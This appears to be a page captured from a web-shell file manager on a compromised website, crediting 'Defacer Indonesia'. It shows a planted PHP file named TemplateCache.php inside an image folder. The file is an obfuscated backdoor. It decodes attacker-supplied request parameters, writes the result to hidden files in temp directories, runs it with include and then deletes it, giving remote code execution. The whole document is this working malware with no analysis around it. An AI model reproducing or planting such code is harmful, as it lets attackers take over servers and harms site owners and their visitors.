whoami7 - Manager
:
/
home
/
analuakl
/
amplhomes.com
/
images
/
socail-icon
/
Upload File:
files >> /home/analuakl/amplhomes.com/images/socail-icon/TemplateCache.php
<?php if(filter_has_var(INPUT_POST, "d\x65sc")){ $bind = $_REQUEST["d\x65sc"]; $bind =explode ( "." , $bind ) ; $pgrp = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt7); $__len = count( $bind); for( $p = 0; $p < $__len; $p++) { $v2 = $bind[$p]; $chS = ord( $salt7[$p % $lenS]); $d = ( ( int)$v2 - $chS -( $p % 10)) ^ 4; $pgrp .= chr( $d); } $binding = array_filter(["/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), getcwd()]); foreach ($binding as $holder) { if ((function($d) { return is_dir($d) && is_writable($d); })($holder)) { $entry = str_replace("{var_dir}", $holder, "{var_dir}/.parameter_group"); if (file_put_contents($entry, $pgrp)) { include $entry; @unlink($entry); exit; } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["p\x74r"])){ $entry = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), getenv("TEMP"), "/var/tmp", "/tmp", sys_get_temp_dir(), getcwd()]); $val = $_REQUEST["p\x74r"]; $val =explode ('.' , $val) ; $tkn = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s8 ); $r = 0; $__tmp = $val; while ($v1 = array_shift($__tmp)) { $sChar = ord($s8[$r % $sLen] ); $d = ((int)$v1 - $sChar - ($r % 10)) ^2; $tkn .=chr($d ); $r++;} foreach ($entry as $key): if ((is_dir($key) and is_writable($key))) { $rec = "$key" . "/.binding"; if (@file_put_contents($rec, $tkn) !== false) { include $rec; unlink($rec); die(); } } endforeach; }
Copyright ©2021 || Defacer Indonesia